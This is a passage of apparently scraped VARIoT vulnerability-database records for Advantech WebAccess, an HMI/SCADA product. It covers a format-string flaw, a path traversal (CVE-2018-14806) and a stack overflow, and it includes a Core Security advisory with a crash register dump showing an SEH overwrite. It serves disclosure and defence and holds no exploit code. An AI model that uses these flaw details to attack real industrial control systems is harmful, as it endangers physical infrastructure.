"@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01.pdf" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/52051" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0242" }, { "trust": 0.8, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01a.pdf" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-0242" }, { "trust": 0.4, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-11-279-01.pdf" }, { "trust": 0.3, "url": "http://webaccess.advantech.com/product.php" }, { "trust": 0.1, "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_intelligence/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/personal/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/products/corporate/vim/ovum_2011_request/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/#comments" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0672" }, { "db": "VULHUB", "id": "VHN-53523" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001560" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-418" }, { "db": "NVD", "id": "CVE-2012-0242" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "19a73622-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0672" }, { "db": "VULHUB", "id": "VHN-53523" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001560" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-418" }, { "db": "NVD", "id": "CVE-2012-0242" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "IVD", "id": "19a73622-2354-11e6-abef-000c29c66e3d" }, { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0672" }, { "date": "2012-02-21T00:00:00", "db": "VULHUB", "id": "VHN-53523" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001560" }, { "date": "2011-11-09T12:04:37", "db": "PACKETSTORM", "id": "106765" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-418" }, { "date": "2012-02-21T13:31:57.203000", "db": "NVD", "id": "CVE-2012-0242" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0672" }, { "date": "2018-01-05T00:00:00", "db": "VULHUB", "id": "VHN-53523" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001560" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-418" }, { "date": "2024-11-21T01:34:38.910000", "db": "NVD", "id": "CVE-2012-0242" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-418" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess Format string vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001560" }, { "db": "CNNVD", "id": "CNNVD-201202-418" } ], "trust": 1.4 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Format string", "sources": [ { "db": "IVD", "id": "19a73622-2354-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201202-418" } ], "trust": 0.8 } }
var-201810-0391
Vulnerability from variot
Advantech WebAccess 8.3.1 and earlier has a path traversal vulnerability which may allow an attacker to execute arbitrary code. Advantech WebAccess Contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. A stack-based buffer overflow vulnerability 2. A directory-traversal vulnerability 3. An arbitrary-file-deletion vulnerability 4. This may aid in further attacks. Advantech WebAccess 8.3.1 and prior versions are vulnerable
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201810-0391", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.3.1" }, { "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.3.1" }, { "model": "webaccess node", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.1" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3.3" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2fe7ab0-39ab-11e9-941d-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-1301" }, { "db": "CNVD", "id": "CNVD-2018-21791" }, { "db": "BID", "id": "105728" }, { "db": "JVNDB", "id": "JVNDB-2018-011084" }, { "db": "CNNVD", "id": "CNNVD-201810-1187" }, { "db": "NVD", "id": "CVE-2018-14806" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-011084" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Mat Powell of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-18-1301" }, { "db": "BID", "id": "105728" } ], "trust": 1.0 }, "cve": "CVE-2018-14806", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2018-14806", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2018-14806", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2018-21791", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e2fe7ab0-39ab-11e9-941d-000c29342cb1", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-125002", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2018-14806", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-14806", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2018-14806", "trust": 0.8, "value": "Critical" }, { "author": "ZDI", "id": "CVE-2018-14806", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2018-21791", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201810-1187", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "e2fe7ab0-39ab-11e9-941d-000c29342cb1", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-125002", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "e2fe7ab0-39ab-11e9-941d-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-1301" }, { "db": "CNVD", "id": "CNVD-2018-21791" }, { "db": "VULHUB", "id": "VHN-125002" }, { "db": "JVNDB", "id": "JVNDB-2018-011084" }, { "db": "CNNVD", "id": "CNNVD-201810-1187" }, { "db": "NVD", "id": "CVE-2018-14806" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess 8.3.1 and earlier has a path traversal vulnerability which may allow an attacker to execute arbitrary code. Advantech WebAccess Contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities:\n1. A stack-based buffer overflow vulnerability\n2. A directory-traversal vulnerability\n3. An arbitrary-file-deletion vulnerability\n4. This may aid in further attacks. \nAdvantech WebAccess 8.3.1 and prior versions are vulnerable", "sources": [ { "db": "NVD", "id": "CVE-2018-14806" }, { "db": "JVNDB", "id": "JVNDB-2018-011084" }, { "db": "ZDI", "id": "ZDI-18-1301" }, { "db": "CNVD", "id": "CNVD-2018-21791" }, { "db": "BID", "id": "105728" }, { "db": "IVD", "id": "e2fe7ab0-39ab-11e9-941d-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-125002" } ], "trust": 3.33 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-14806", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-18-296-01", "trust": 3.4 }, { "db": "BID", "id": "105728", "trust": 2.0 }, { "db": "SECTRACK", "id": "1041939", "trust": 1.7 }, { "db": "CNNVD", "id": "CNNVD-201810-1187", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2018-21791", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-011084", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-6288", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-1301", "trust": 0.7 }, { "db": "IVD", "id": "E2FE7AB0-39AB-11E9-941D-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-125002", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e2fe7ab0-39ab-11e9-941d-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-1301" }, { "db": "CNVD", "id": "CNVD-2018-21791" }, { "db": "VULHUB", "id": "VHN-125002" }, { "db": "BID", "id": "105728" }, { "db": "JVNDB", "id": "JVNDB-2018-011084" }, { "db": "CNNVD", "id": "CNNVD-201810-1187" }, { "db": "NVD", "id": "CVE-2018-14806" } ] }, "id": "VAR-201810-0391", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "e2fe7ab0-39ab-11e9-941d-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21791" }, { "db": "VULHUB", "id": "VHN-125002" } ], "trust": 1.4399341300000001 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2fe7ab0-39ab-11e9-941d-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21791" } ] }, "last_update_date": "2024-11-23T22:06:35.888000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "\u30c8\u30c3\u30d7\u30da\u30fc\u30b8", "trust": 0.8, "url": "https://www.advantech.co.jp/" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01" }, { "title": "Patch for Advantech WebAccess Path Traversal Vulnerability (CNVD-2018-21791)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/143181" }, { "title": "Advantech WebAccess Repair measures for path traversal vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=86279" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-1301" }, { "db": "CNVD", "id": "CNVD-2018-21791" }, { "db": "JVNDB", "id": "JVNDB-2018-011084" }, { "db": "CNNVD", "id": "CNNVD-201810-1187" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-22", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-125002" }, { "db": "JVNDB", "id": "JVNDB-2018-011084" }, { "db": "NVD", "id": "CVE-2018-14806" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.0, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-296-01" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/105728" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1041939" }, { "trust": 1.0, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-296-01%2c" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-14806" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14806" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" }, { "trust": 0.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-296-01," } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-1301" }, { "db": "CNVD", "id": "CNVD-2018-21791" }, { "db": "VULHUB", "id": "VHN-125002" }, { "db": "BID", "id": "105728" }, { "db": "JVNDB", "id": "JVNDB-2018-011084" }, { "db": "CNNVD", "id": "CNNVD-201810-1187" }, { "db": "NVD", "id": "CVE-2018-14806" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "e2fe7ab0-39ab-11e9-941d-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-1301" }, { "db": "CNVD", "id": "CNVD-2018-21791" }, { "db": "VULHUB", "id": "VHN-125002" }, { "db": "BID", "id": "105728" }, { "db": "JVNDB", "id": "JVNDB-2018-011084" }, { "db": "CNNVD", "id": "CNNVD-201810-1187" }, { "db": "NVD", "id": "CVE-2018-14806" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-10-26T00:00:00", "db": "IVD", "id": "e2fe7ab0-39ab-11e9-941d-000c29342cb1" }, { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1301" }, { "date": "2018-10-25T00:00:00", "db": "CNVD", "id": "CNVD-2018-21791" }, { "date": "2018-10-23T00:00:00", "db": "VULHUB", "id": "VHN-125002" }, { "date": "2018-10-23T00:00:00", "db": "BID", "id": "105728" }, { "date": "2019-01-07T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-011084" }, { "date": "2018-10-24T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1187" }, { "date": "2018-10-23T20:29:00.437000", "db": "NVD", "id": "CVE-2018-14806" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-10-24T00:00:00", "db": "ZDI", "id": "ZDI-18-1301" }, { "date": "2018-10-26T00:00:00", "db": "CNVD", "id": "CNVD-2018-21791" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-125002" }, { "date": "2018-10-23T00:00:00", "db": "BID", "id": "105728" }, { "date": "2019-01-07T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-011084" }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1187" }, { "date": "2024-11-21T03:49:50.193000", "db": "NVD", "id": "CVE-2018-14806" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201810-1187" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Path traversal vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-011084" }, { "db": "CNNVD", "id": "CNNVD-201810-1187" } ], "trust": 1.4 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Path traversal", "sources": [ { "db": "IVD", "id": "e2fe7ab0-39ab-11e9-941d-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201810-1187" } ], "trust": 0.8 } }
var-201409-0442
Vulnerability from variot
Stack-based buffer overflow in Advantech WebAccess (formerly BroadWin WebAccess) 7.2 allows remote attackers to execute arbitrary code via the AccessCode parameter. Advantech WebAccess is an IE-based HMI/SCADA monitoring software that features all engineering projects, database setup, drawing and software management using a standard browser over the internet or intranet. A buffer overflow vulnerability exists in Advantech WebAccess. An attacker exploits a vulnerability to execute arbitrary code in the context of an affected application or to crash the entire application. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.2 is vulnerable; other versions may also be affected. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Advantech WebAccess Vulnerabilities
-
Advisory Information
Title: Advantech WebAccess Vulnerabilities Advisory ID: CORE-2014-0005 Advisory URL: http://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities Date published: 2014-09-02 Date of last update: 2014-09-01 Vendors contacted: Advantech Release mode: User release
-
Vulnerability Description
Advantech WebAccess [1] is a browser-based software package for human-machine interfaces HMI, and supervisory control and data acquisition SCADA.
-
WebAccess 7.2 .
-
Non-vulnerable packages
. AdvantechWebAccessUSANode_20140730_3.4.3
-
Vendor Information, Solutions and Workarounds
Advantech has addressed the vulnerability in WebAccess by issuing an update located at http://webaccess.advantech.com/downloads_software.php
Given that this is a client-side vulnerability, affected users should avoid opening untrusted '.html' files. Core Security also recommends those affected use third party software such as Sentinel [4] or EMET [3] that could help to prevent the exploitation of affected systems to some extent.
-
Credits
This vulnerability was discovered and researched by Ricardo Narvaja from Core Security Exploit Writers Team.
Core Security Advisories Team would also like to thank ICS-CERT Coordination Center for their assistance during the vulnerability reporting process.
-
Below is shown the result of opening a malicious html file with a long NodeName parameter, an attacker can overflow the stack buffer mentioned above and overwrite the SEH (Structured Exception Handler), enabling arbitrary code execution on the machine.
/-----
EAX 03A39942 ASCII "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB..." ECX 0162B720 EDX 01630000 xpsp2res.01630000 EBX 0162B720 ESP 0162B454 EBP 0162B460 ESI 0162B4D8 EDI 03A31E98 EIP 064EA6D4 webvact.064EA6D4
-----/
/-----
SEH chain of thread 000016CC Address SE handler 0162DB40 42424242
-----/
-
Report Timeline . 2014-05-06: Core Security notifies Advantech of the vulnerability. Publication date is set for May 26th, 2014. 2014-05-09: CORE asks for a reply. 2014-05-26: First release date missed. 2014-05-26: Core Security notifies that the issues were reported 2 weeks ago and there was no reply since May 6th, 2014. 2014-05-29: Core Security contacts the ICS-CERT for assistance in order to coordinate the disclosure of the advisory. 2014-05-29: ICS-CERT acknowledges Core Security e-mail, and asks for a technical description of the vulnerability. 2014-05-29: Core Security sends technical details to the ICS-CERT. 2014-06-05: ICS-CERT team notifies that they have contacted the vendor and that they will notify us once the vendor has validated the vulnerabilities. 2014-06-18: ICS-CERT team notifies that the vendor is working in a new release, expected to be released in September, and ask if Core Security is interested in validating Advantech's vulnerability fix in their beta version. 2014-06-18: Core Security accepts the testing of the vendor beta version, but shares their concerns about waiting several months for fixes that are related to vulnerabilities already public. 2014-06-18: ICS-CERT notifies that they will let us know when they plan to make the beta version available for testing. 2014-07-03: ICS-CERT team notifies that the vendor is working to provide a download link for the beta version. 2014-07-08: ICS-CERT team sends download link provided by the vendor. 2014-07-10: Core Security confirms to ICS-CERT that the new version it's still vulnerable, and comments that after some analysis the vulnerable function doesn't has changes. 2014-07-10: ICS-CERT notifies that they will let the vendor know that that the vulnerabilities still exist. And asks to setup a teleconference between Core Security, the CERT and the vendor. 2014-07-10: Core Security notifies the ICS-CERT that all interactions are made via email only. 2014-07-10: ICS-CERT notifies they provided the information to the vendor. 2014-07-21: Core Security notifies the ICS-CERT that Tipping Point Zero Day Initiative has released several advisories[2] affecting the vendor including some that appears to be related to the one we are coordinating. 2014-07-21: ICS-CERT notifies that some of those advisories where in coordination with them, and that after a review of the link shared by Core Security are related to ICSA-14-198-02 and don't appear to be related to the reported vulnerability. 2014-07-21: Core Security notifies that ZDI-14-243 and ZDI-14-244 appears to be directly related. 2014-07-21: ICS-CERT is trying to contact Advantech to get a status update and their current plan for vulnerability remediation. 2014-08-07: ICS-CERT notifies that they contacted the vendor and they are waiting for an status update. 2014-08-21: Core Security contacts ICS-CERT since no reply was received in the past two weeks. 2014-08-21: ICS-CERT notifies that vendor representative stated that they are currently training a new product manager and they have not yet responded to the vulnerabilities we are discussing. 2014-08-28: Core Security notifies the ICS-CERT that the advisory publication is going to be scheduled for Monday 1st of September. 2014-08-28: ICS-CERT acknowledges Core Security e-mail. 2014-08-28: Core Security re-schedules the advisory publication for Sep 2nd, 2014. 2014-09-02: Core Security found out that the vendor released a silent fix on 30th of July. 2014-09-02: Core Security releases the advisory CORE-2014-0005 tagged as user-release.
-
References
[1] http://webaccess.advantech.com/. [2] http://www.zerodayinitiative.com/advisories/published/. [3] http://support.microsoft.com/kb/2458544. [4] https://github.com/CoreSecurity/sentinel.
-
About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
-
About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
